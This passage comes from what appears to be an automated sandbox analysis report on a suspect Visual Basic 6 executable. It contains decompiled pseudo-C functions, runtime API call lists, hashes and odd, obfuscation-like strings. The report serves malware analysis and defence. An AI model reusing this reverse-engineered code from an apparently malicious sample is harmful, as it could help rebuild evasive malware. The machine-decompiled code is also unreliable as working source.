          • #542.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416884
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,00000002,?,?,?,?,?,?,?,?,?,Out of string space), ref: 0041689F
          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,?,?,00000002), ref: 004168B5
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 004168DF
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000004C), ref: 00416941
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411DAC,00000024), ref: 004169A1
          • __vbaStrMove.MSVBVM60(00000000,?,00411DAC,00000024), ref: 004169CB
          • __vbaFreeObj.MSVBVM60(00000000,?,00411DAC,00000024), ref: 004169D3
          • __vbaFreeStr.MSVBVM60(00416A1D), ref: 00416A0F
          • __vbaFreeVar.MSVBVM60(00416A1D), ref: 00416A17
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$Move$CheckHresult$#542#651#666ChkstkListNew2
          • String ID: 8-8-8$Dedications3$Lumskes6$Out of string space$Statscheferstronhi8
          • API String ID: 2969453677-2753518913
          • Opcode ID: 2828a58d2e7a9661adc3e163e66c421372ec8223416125dfbc269adc1f5817ff
          • Instruction ID: 564d23e04cacc0585b0ae0c634707533633ec7c8c13ec3a35c86bba007bea928
          • Opcode Fuzzy Hash: 2828a58d2e7a9661adc3e163e66c421372ec8223416125dfbc269adc1f5817ff
          • Instruction Fuzzy Hash: 9351D771D10229DFDB10EBA1CC85BDEB7B4BF04704F5081AAE109B71A1DB785A89CF58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 46%
          			E00416F6E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				intOrPtr _v28;
          				intOrPtr _v32;
          				intOrPtr _v36;
          				void* _v40;
          				signed int _v44;
          				intOrPtr _v52;
          				char _v60;
          				intOrPtr _v68;
          				intOrPtr _v76;
          				char* _v100;
          				intOrPtr _v108;
          				intOrPtr _v132;
          				intOrPtr _v140;
          				void* _v160;
          				signed int _v164;
          				intOrPtr* _v168;
          				signed int _v172;
          				signed int _v184;
          				intOrPtr* _v188;
          				signed int _v192;
          				signed int _v196;
          				void* _t75;
          				char* _t76;
          				short _t77;
          				signed int _t83;
          				signed int _t89;
          				void* _t117;
          				void* _t119;
          				intOrPtr _t120;
          
          				_t120 = _t119 - 0xc;
          				 *[fs:0x0] = _t120;
          				L004016F0();
          				_v16 = _t120;
          				_v12 = 0x401698;
          				_v8 = 0;
          				_t75 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t117);
          				_push(2);
          				_push("ABC");
          				_push(0x411ecc);
          				_push(0);
          				L0040182E();
          				if(_t75 != 3) {
          					_v68 = _a4;
          					_v76 = 9;
          					_v100 = L"bucketeer";
          					_v108 = 8;
          					_v132 = 0x498b97;
          					_v140 = 3;
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(3);
          					_push(L"YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81");
          					_push(_v36);
          					L004018FA();
          					_t120 = _t120 + 0x3c;
          				}
          				_v52 = 0x98e72e79;
          				_v60 = 3;
          				_t76 =  &_v60;
          				_push(_t76);
          				L00401798();
          				_v160 =  ~(0 | _t76 != 0x0000ffff);
          				L00401912();
          				_t77 = _v160;
          				if(_t77 != 0) {
          					if( *0x4183d8 != 0) {
          						_v188 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v188 = 0x4183d8;
          					}
          					_v160 =  *_v188;
          					_t83 =  *((intOrPtr*)( *_v160 + 0x1c))(_v160,  &_v40);
          					asm("fclex");
          					_v164 = _t83;
          					if(_v164 >= 0) {
          						_v192 = _v192 & 0x00000000;
          					} else {
          						_push(0x1c);
          						_push(0x411ad0);
          						_push(_v160);
          						_push(_v164);
          						L00401906();
          						_v192 = _t83;
          					}
          					_v168 = _v40;
          					_v68 = 0x80020004;
          					_v76 = 0xa;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_t89 =  *((intOrPtr*)( *_v168 + 0x54))(_v168, 0x10,  &_v44);
          					asm("fclex");
          					_v172 = _t89;
          					if(_v172 >= 0) {
          						_v196 = _v196 & 0x00000000;
          					} else {
          						_push(0x54);
          						_push(0x411c24);
          						_push(_v168);
          						_push(_v172);
          						L00401906();
          						_v196 = _t89;
          					}
          					_v184 = _v44;
          					_v44 = _v44 & 0x00000000;
          					_v52 = _v184;
          					_v60 = 9;
          					_t77 = 0x10;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0);
          					_push(_v32);
          					L0040191E();
          					L004018AC();
          					L00401912();
          				}
          				_push(1);
          				L00401792();
          				if(_t77 != 0x800000) {
          					L00401870();
          				}
          				_v28 =  *0x401690;
          				asm("wait");
          				_push(0x417212);
          				L004018AC();
          				L004018AC();
          				return _t77;
          			}


          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416F8C
          • __vbaInStr.MSVBVM60(00000000,00411ECC,ABC,00000002,?,?,?,?,004016F6), ref: 00416FBE
          • __vbaChkstk.MSVBVM60 ref: 00416FF7
          • __vbaChkstk.MSVBVM60 ref: 00417008
          • __vbaChkstk.MSVBVM60 ref: 00417019
          • __vbaLateMemCall.MSVBVM60(?,YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81,00000003), ref: 00417034
          • #561.MSVBVM60(00000003), ref: 0041704E
          • __vbaFreeVar.MSVBVM60(00000003), ref: 00417068
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00000003), ref: 0041708F
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C), ref: 004170F1
          • __vbaChkstk.MSVBVM60(?), ref: 00417123
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,00000054), ref: 00417166
          • __vbaChkstk.MSVBVM60(00000000,?,00411C24,00000054), ref: 0041719A
          • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 004171AD
          • __vbaFreeObj.MSVBVM60(?,00000000), ref: 004171B5
          • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004171BD
          • #589.MSVBVM60(00000001,00000003), ref: 004171C4
          • __vbaEnd.MSVBVM60(00000001,00000003), ref: 004171D0
          • __vbaFreeObj.MSVBVM60(00417212,00000001,00000003), ref: 00417204
          • __vbaFreeObj.MSVBVM60(00417212,00000001,00000003), ref: 0041720C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Chkstk$Free$CheckHresultLate$#561#589CallNew2
          • String ID: ABC$YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81$bucketeer
          • API String ID: 867805743-4092157262
          • Opcode ID: 10c774624573defe86ecaafa48cd6415dced7ad86f661b01813ae152977517d4
          • Instruction ID: 043a4e41784f4a0c0986065f7879df4b65474b6404f015a2206ff761a66a7f4f
          • Opcode Fuzzy Hash: 10c774624573defe86ecaafa48cd6415dced7ad86f661b01813ae152977517d4
          • Instruction Fuzzy Hash: 96613671900318AFDB11EF94CC46BDEBBB1AF09704F1044AAF508BB2A1C7B95A85DF19
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 48%
          			E004156C7(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int __fp0) {
          				intOrPtr _v8;
          				signed int* _v12;
          				signed int _v24;
          				void* _v28;
          				char _v32;
          				signed int _v40;
          				char _v48;
          				void* _v68;
          				signed int _v72;
          				intOrPtr* _v76;
          				signed int _v80;
          				char _v88;
          				signed int _v92;
          				signed int _v96;
          				signed int _v100;
          				intOrPtr* _v104;
          				signed int _v108;
          				signed int _v112;
          				signed int _t81;
          				signed int _t85;
          				signed int _t89;
          				signed int _t93;
          				signed int _t99;
          				char* _t105;
          				signed int* _t115;
          				signed int _t118;
          				signed int _t124;
          
          				_t124 = __fp0;
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t115;
          				_push(0x5c);
          				L004016F0();
          				_v12 = _t115;
          				_v8 = 0x401550;
          				if( *0x4183d8 != 0) {
          					_v88 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v88 = 0x4183d8;
          				}
          				_v68 =  *_v88;
          				_t81 =  *((intOrPtr*)( *_v68 + 0x14))(_v68,  &_v32);
          				asm("fclex");
          				_v72 = _t81;
          				if(_v72 >= 0) {
          					_v92 = _v92 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v68);
          					_push(_v72);
          					L00401906();
          					_v92 = _t81;
          				}
          				_v76 = _v32;
          				_t85 =  *((intOrPtr*)( *_v76 + 0x138))(_v76, L"Challa", 1);
          				asm("fclex");
          				_v80 = _t85;
          				_t118 = _v80;
          				if(_t118 >= 0) {
          					_v96 = _v96 & 0x00000000;
          				} else {
          					_push(0x138);
          					_push(0x411c4c);
          					_push(_v76);
          					_push(_v80);
          					L00401906();
          					_v96 = _t85;
          				}
          				_t105 =  &_v32;
          				L004018AC();
          				_v40 = 1;
          				_v48 = 2;
          				_push( &_v48);
          				asm("fld1");
          				_push(_t105);
          				_push(_t105);
          				 *_t115 = _t124;
          				asm("fld1");
          				_push(_t105);
          				_push(_t105);
          				_v72 = _t124;
          				asm("fld1");
          				_push(_t105);
          				_push(_t105);
          				_v80 = _t124;
          				_push(_t105);
          				_push(_t105);
          				_v88 =  *0x401548;
          				L0040180A();
          				L0040193C();
          				asm("fcomp qword [0x401540]");
          				asm("fnstsw ax");
          				asm("sahf");
          				if(_t118 == 0) {
          					_v100 = _v100 & 0x00000000;
          				} else {
          					_v100 = 1;
          				}
          				_v68 =  ~_v100;
          				L00401912();
          				_t89 = _v68;
          				if(_t89 != 0) {
          					_push(0x30);
          					L00401804();
          					_v24 = _t89;
          				}
          				_push(0x411d10);
          				L004017F8();
          				_push(_t89);
          				L004017FE();
          				L00401882();
          				_push(_t89);
          				_push(0x411a30);
          				L0040184C();
          				asm("sbb eax, eax");
          				_v68 =  ~( ~( ~_t89));
          				L00401924();
          				_t93 = _v68;
          				if(_t93 != 0) {
          					if( *0x4183d8 != 0) {
          						_v104 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v104 = 0x4183d8;
          					}
          					_v68 =  *_v104;
          					_t99 =  *((intOrPtr*)( *_v68 + 0x1c))(_v68,  &_v32);
          					asm("fclex");
          					_v72 = _t99;
          					if(_v72 >= 0) {
          						_v108 = _v108 & 0x00000000;
          					} else {
          						_push(0x1c);
          						_push(0x411ad0);
          						_push(_v68);
          						_push(_v72);
          						L00401906();
          						_v108 = _t99;
          					}
          					_v76 = _v32;
          					_t93 =  *((intOrPtr*)( *_v76 + 0x50))(_v76);
          					asm("fclex");
          					_v80 = _t93;
          					if(_v80 >= 0) {
          						_v112 = _v112 & 0x00000000;
          					} else {
          						_push(0x50);
          						_push(0x411c24);
          						_push(_v76);
          						_push(_v80);
          						L00401906();
          						_v112 = _t93;
          					}
          					L004018AC();
          				}
          				asm("wait");
          				_push(0x41592a);
          				return _t93;
          			}


          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004156E2
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 00415707
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 0041574B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000138), ref: 0041578F
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,00000138), ref: 004157A0
          • #673.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 004157D7
          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 004157DC
          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00415805
          • #571.MSVBVM60(00000030,?,?,?,?,?,?,?,?,00000002), ref: 00415814
          • __vbaI4Str.MSVBVM60(00411D10,?,?,?,?,?,?,?,?,00000002), ref: 00415824
          • #697.MSVBVM60(00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 0041582A
          • __vbaStrMove.MSVBVM60(00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 00415834
          • __vbaStrCmp.MSVBVM60(00411A30,00000000,00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 0041583F
          • __vbaFreeStr.MSVBVM60(00411A30,00000000,00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 00415853
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411A30,00000000,00000000,00411D10,?,?,?,?,?,?,?,?,00000002), ref: 00415877
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C,?,?,?,?,?,?,?,?,00000002), ref: 004158BB
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,00000050,?,?,?,?,?,?,?,?,00000002), ref: 004158F2
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00415903
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$New2$#571#673#697ChkstkMove
          • String ID: Challa
          • API String ID: 3491129088-2699440810
          • Opcode ID: eb82d834e0425f395a49baa83982b153beed3d9e9850deae5663a1120ea88132
          • Instruction ID: a790c12257c280e0c0c57a98bbec7fe4d2420d1120e5184c6c2c99ff5c119b95
          • Opcode Fuzzy Hash: eb82d834e0425f395a49baa83982b153beed3d9e9850deae5663a1120ea88132
          • Instruction Fuzzy Hash: CF6139B0D50608EFDB00EF95C845BEEBBB4FF04745F10452AE115BB2A0DBB85986DB19
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E00416CD5(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				intOrPtr _v28;
          				void* _v32;
          				signed int _v36;
          				char _v40;
          				char _v56;
          				char* _v64;
          				intOrPtr _v72;
          				signed int _v76;
          				signed int _v80;
          				intOrPtr* _v84;
          				signed int _v88;
          				short _v92;
          				intOrPtr _v104;
          				intOrPtr* _v108;
          				signed int _v112;
          				signed int _v116;
          				signed int _v120;
          				intOrPtr* _v124;
          				signed int _v128;
          				signed int _v132;
          				signed int _t103;
          				signed int _t108;
          				char* _t112;
          				signed int _t118;
          				signed int _t123;
          				signed int _t124;
          				signed int _t127;
          				void* _t140;
          				void* _t142;
          				intOrPtr _t143;
          
          				_t143 = _t142 - 0xc;
          				 *[fs:0x0] = _t143;
          				L004016F0();
          				_v16 = _t143;
          				_v12 = 0x401680;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x6c,  *[fs:0x0], 0x4016f6, _t140);
          				if( *0x4183d8 != 0) {
          					_v108 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v108 = 0x4183d8;
          				}
          				_v76 =  *_v108;
          				_t103 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
          				asm("fclex");
          				_v80 = _t103;
          				if(_v80 >= 0) {
          					_v112 = _v112 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v76);
          					_push(_v80);
          					L00401906();
          					_v112 = _t103;
          				}
          				_v84 = _v40;
          				_t108 =  *((intOrPtr*)( *_v84 + 0x50))(_v84,  &_v36);
          				asm("fclex");
          				_v88 = _t108;
          				if(_v88 >= 0) {
          					_v116 = _v116 & 0x00000000;
          				} else {
          					_push(0x50);
          					_push(0x411c4c);
          					_push(_v84);
          					_push(_v88);
          					L00401906();
          					_v116 = _t108;
          				}
          				_push(_v36);
          				_push(0);
          				L0040184C();
          				asm("sbb eax, eax");
          				_v92 =  ~( ~_t108 + 1);
          				L00401924();
          				L004018AC();
          				_t112 = _v92;
          				if(_t112 != 0) {
          					_v64 = L"Subvicarship";
          					_v72 = 8;
          					L004018A0();
          					_t112 =  &_v56;
          					_push(_t112);
          					L0040188E();
          					L00401912();
          				}
          				_push(0x411a30);
          				L0040179E();
          				if(_t112 != 0x61) {
          					_t127 =  *((intOrPtr*)( *_a4 + 0x720))(_a4);
          					_v76 = _t127;
          					if(_v76 >= 0) {
          						_v120 = _v120 & 0x00000000;
          					} else {
          						_push(0x720);
          						_push(0x4105e8);
          						_push(_a4);
          						_push(_v76);
          						L00401906();
          						_v120 = _t127;
          					}
          				}
          				if( *0x4183d8 != 0) {
          					_v124 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v124 = 0x4183d8;
          				}
          				_v76 =  *_v124;
          				_t118 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
          				asm("fclex");
          				_v80 = _t118;
          				if(_v80 >= 0) {
          					_v128 = _v128 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v76);
          					_push(_v80);
          					L00401906();
          					_v128 = _t118;
          				}
          				_v84 = _v40;
          				_t123 =  *((intOrPtr*)( *_v84 + 0xe8))(_v84,  &_v36);
          				asm("fclex");
          				_v88 = _t123;
          				if(_v88 >= 0) {
          					_v132 = _v132 & 0x00000000;
          				} else {
          					_push(0xe8);
          					_push(0x411c4c);
          					_push(_v84);
          					_push(_v88);
          					L00401906();
          					_v132 = _t123;
          				}
          				_t124 = _v36;
          				_v104 = _t124;
          				_v36 = _v36 & 0x00000000;
          				L00401882();
          				L004018AC();
          				_v28 =  *0x401678;
          				asm("wait");
          				_push(0x416f47);
          				L00401924();
          				return _t124;
          			}


          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416CF1
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 00416D28
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 00416D6C
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000050), ref: 00416DA7
          • __vbaStrCmp.MSVBVM60(00000000,?), ref: 00416DBA
          • __vbaFreeStr.MSVBVM60(00000000,?), ref: 00416DCD
          • __vbaFreeObj.MSVBVM60(00000000,?), ref: 00416DD5
          • __vbaVarDup.MSVBVM60(00000000,?), ref: 00416DF6
          • #529.MSVBVM60(?,00000000,?), ref: 00416DFF
          • __vbaFreeVar.MSVBVM60(?,00000000,?), ref: 00416E07
          • #696.MSVBVM60(00411A30,00000000,?), ref: 00416E11
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401680,004105E8,00000720), ref: 00416E43
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411A30,00000000,?), ref: 00416E64
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 00416EA8
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000E8), ref: 00416EE9
          • __vbaStrMove.MSVBVM60(00000000,?,00411C4C,000000E8), ref: 00416F07
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,000000E8), ref: 00416F0F
          • __vbaFreeStr.MSVBVM60(00416F47), ref: 00416F41
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$New2$#529#696ChkstkMove
          • String ID: Subvicarship
          • API String ID: 3028026186-131754160
          • Opcode ID: 406504d560e972d198d8077133cd78a141edc63ee93c57a842756d1799996737
          • Instruction ID: 8d6bbcceaa2b49c4c0ea8bbd52c7005224708ee9ff3e504dc3d987a8fb857027
          • Opcode Fuzzy Hash: 406504d560e972d198d8077133cd78a141edc63ee93c57a842756d1799996737
          • Instruction Fuzzy Hash: D871F174D00208AFCF00EFA5C945BDDBBB0BF08745F20852AE405BB2A1DBB99985DF58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 52%
          			E00414E57(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr* _v16;
          				intOrPtr _v28;
          				short _v32;
          				short _v36;
          				char _v40;
          				void* _v44;
          				void* _v48;
          				signed int _v52;
          				signed int _v56;
          				intOrPtr* _v60;
          				signed int _v64;
          				signed int _v76;
          				void* _v80;
          				signed int _v84;
          				signed int _v88;
          				void* _t59;
          				signed int _t65;
          				signed int _t70;
          				short _t71;
          				signed int _t74;
          				char* _t77;
          				void* _t84;
          				void* _t86;
          				intOrPtr* _t87;
          
          				_t87 = _t86 - 0xc;
          				 *[fs:0x0] = _t87;
          				L004016F0();
          				_v16 = _t87;
          				_v12 = 0x4014e0;
          				_v8 = 0;
          				_t59 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x4016f6, _t84);
          				L004018F4();
          				_push(0);
          				_push(0xffffffff);
          				_push(1);
          				_push(0);
          				_push(0x411a30);
          				_push(_v40);
          				L00401840();
          				_t77 =  &_v40;
          				L00401882();
          				_push(_v40);
          				_push(0x411c44);
          				L0040184C();
          				if(_t59 != 0) {
          					L0040183A();
          					_v80 =  *0x4014d4;
          					_v84 =  *0x4014d0;
          					_v88 =  *0x4014cc;
          					 *_t87 =  *0x4014c8;
          					_t74 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t77, _t77, _t77, _t77, _t59);
          					asm("fclex");
          					_v52 = _t74;
          					if(_v52 >= 0) {
          						_v76 = _v76 & 0x00000000;
          					} else {
          						_push(0x2c8);
          						_push(0x4105b8);
          						_push(_a4);
          						_push(_v52);
          						L00401906();
          						_v76 = _t74;
          					}
          				}
          				if( *0x4183d8 != 0) {
          					_v80 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v80 = 0x4183d8;
          				}
          				_v52 =  *_v80;
          				_t65 =  *((intOrPtr*)( *_v52 + 0x14))(_v52,  &_v44);
          				asm("fclex");
          				_v56 = _t65;
          				if(_v56 >= 0) {
          					_v84 = _v84 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v52);
          					_push(_v56);
          					L00401906();
          					_v84 = _t65;
          				}
          				_v60 = _v44;
          				_t70 =  *((intOrPtr*)( *_v60 + 0x108))(_v60,  &_v48);
          				asm("fclex");
          				_v64 = _t70;
          				if(_v64 >= 0) {
          					_v88 = _v88 & 0x00000000;
          				} else {
          					_push(0x108);
          					_push(0x411c4c);
          					_push(_v60);
          					_push(_v64);
          					L00401906();
          					_v88 = _t70;
          				}
          				_t71 = _v48;
          				_v36 = _t71;
          				L004018AC();
          				_push(0x411c60);
          				L00401834();
          				if(_t71 != 1) {
          					_push(0xff8d5482);
          					_push(L"samtaleemnetsrhes");
          					_push(L"Hofdesserternes7");
          					_push(0);
          					L0040182E();
          					_v28 = _t71;
          				}
          				_v32 = 0x1e2c;
          				asm("wait");
          				_push(0x41503f);
          				L00401924();
          				return _t71;
          			}






























          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414E73
          • __vbaStrCopy.MSVBVM60(?,?,?,?,004016F6), ref: 00414E9F
          • #712.MSVBVM60(00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414EB4
          • __vbaStrMove.MSVBVM60(00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414EBE
          • __vbaStrCmp.MSVBVM60(00411C44,00000000,00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414ECB
          • __vbaFpI4.MSVBVM60(00411C44,00000000,00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414EDA
          • __vbaHresultCheckObj.MSVBVM60(00000000,004014E0,004105B8,000002C8,?,?,?,?,00000000,00411C44,00000000,00000000,00411A30), ref: 00414F33
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411C44,00000000,00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414F54
          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411AD0,00000014), ref: 00414F98
          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411C4C,00000108), ref: 00414FD9
          • __vbaFreeObj.MSVBVM60(00000000,00000000,00411C4C,00000108), ref: 00414FF2
          • __vbaLenBstr.MSVBVM60(00411C60), ref: 00414FFC
          • __vbaInStr.MSVBVM60(00000000,Hofdesserternes7,samtaleemnetsrhes,FF8D5482,00411C60), ref: 00415017
          • __vbaFreeStr.MSVBVM60(0041503F,00411C60), ref: 00415039
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckHresult$Free$#712BstrChkstkCopyMoveNew2
          • String ID: Hofdesserternes7$samtaleemnetsrhes$val
          • API String ID: 1974484846-2599820437
          • Opcode ID: c5c267184dc340cfc9bf68ffff00cbaea68062972cda6ed2da3d5e76db945bf8
          • Instruction ID: eb2c0fe58a4518b94977757f63af428bbb9ae2c61f6be94a9ece1075485d274b
          • Opcode Fuzzy Hash: c5c267184dc340cfc9bf68ffff00cbaea68062972cda6ed2da3d5e76db945bf8
          • Instruction Fuzzy Hash: 97512571A40208EFCB00EF95D949FDEBBB0BF08744F20812AF541B62B1DBB95991DB59
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 57%
          			E004174EC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				void* _v28;
          				void* _v32;
          				signed int _v36;
          				char _v40;
          				intOrPtr _v48;
          				intOrPtr _v56;
          				void* _v60;
          				signed int _v64;
          				intOrPtr* _v68;
          				signed int _v72;
          				signed int _v84;
          				intOrPtr _v88;
          				intOrPtr* _v92;
          				signed int _v96;
          				signed int _v100;
          				intOrPtr* _v104;
          				signed int _v108;
          				signed int _v112;
          				signed int _t96;
          				signed int _t101;
          				signed int _t102;
          				signed int _t106;
          				signed int _t112;
          				signed int _t118;
          				void* _t135;
          				void* _t137;
          				intOrPtr _t138;
          
          				_t138 = _t137 - 0xc;
          				 *[fs:0x0] = _t138;
          				L004016F0();
          				_v16 = _t138;
          				_v12 = 0x4016e0;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4016f6, _t135);
          				if( *0x4183d8 != 0) {
          					_v92 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v92 = 0x4183d8;
          				}
          				_v60 =  *_v92;
          				_t96 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
          				asm("fclex");
          				_v64 = _t96;
          				if(_v64 >= 0) {
          					_v96 = _v96 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v60);
          					_push(_v64);
          					L00401906();
          					_v96 = _t96;
          				}
          				_v68 = _v40;
